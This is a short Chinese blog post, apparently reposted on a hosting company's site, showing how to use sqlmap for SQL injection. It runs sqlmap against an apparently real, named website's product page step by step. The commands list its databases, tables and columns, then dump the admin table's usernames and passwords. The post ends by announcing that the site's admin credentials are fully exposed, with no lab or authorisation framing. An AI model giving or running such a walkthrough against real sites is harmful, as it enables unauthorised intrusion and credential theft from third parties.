溫馨提示×

溫馨提示×

您好,登錄后才能下訂單哦!

密碼登錄×
登錄注冊×
其他方式登錄
點(diǎn)擊 登錄注冊 即表示同意《億速云用戶服務(wù)條款》

sqlmap的使用

發(fā)布時(shí)間:2020-07-13 12:10:31 來源:網(wǎng)絡(luò) 閱讀:529 作者:逝去的某人 欄目:安全技術(shù)


sqlmap進(jìn)行注入

1、用掃描工具可以掃出注入點(diǎn)這里我用一個(gè)注入點(diǎn)進(jìn)行說明。

sqlamp.py -u “http://www.gaoneng.com/product.php?cid=71

sqlmap的使用 

可以看出此處存在sql注入漏洞。

2、

sqlmap.py -u “http://www.gaoneng.com/product.php?cid=71

--dbs 可以跑出存在的數(shù)據(jù)庫名

sqlmap的使用 

然后可以跑gaoneng數(shù)據(jù)庫中的表

Sqlmap.py -u”http://www.gaoneng.com/product.php?cid=71 -D gaoneng --tables

sqlmap的使用 

既然已經(jīng)爆出數(shù)據(jù)庫里的表,那就可以爆出表中的字段

Sqlmap.py -u “http://www.gaoneng.com/product.php?cid=71

-D gaoneng -T com_admin --columns

sqlmap的使用 

可以看到這個(gè)表中存在我們需要的字段,密碼與用戶名

Sqlmap.py -u “http://www.gaoneng.com/product.php?cid=71 

-D gaoneng -T com_admin -C username,password --dump

sqlmap的使用 

由此這個(gè)網(wǎng)站的管理員密碼與用戶名已被完全爆出。


向AI問一下細(xì)節(jié)

免責(zé)聲明:本站發(fā)布的內(nèi)容(圖片、視頻和文字)以原創(chuàng)、轉(zhuǎn)載和分享為主,文章觀點(diǎn)不代表本網(wǎng)站立場,如果涉及侵權(quán)請聯(lián)系站長郵箱:is@yisu.com進(jìn)行舉報(bào),并提供相關(guān)證據(jù),一經(jīng)查實(shí),將立刻刪除涉嫌侵權(quán)內(nèi)容。

AI